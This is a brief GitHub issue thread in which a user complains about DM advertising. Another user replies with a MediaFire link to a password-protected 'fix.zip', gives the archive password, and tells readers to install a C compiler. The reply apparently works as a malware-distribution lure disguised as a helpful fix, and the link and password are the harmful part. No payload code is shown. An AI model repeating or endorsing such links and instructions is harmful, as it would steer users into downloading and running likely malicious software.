### ISSUE TITLE
SUggestion: STOP DM ADVERTISING

### ISSUE THREAD

**Issue by f4ursev7n** [MinesonTeam/MinesonAPI#10]
### Description

STOP DM ADVERTISING

### Extra details

STOP DM ADVERTISING

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by f4ursev7n** [comment]
> maybe this will help https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)

shut up
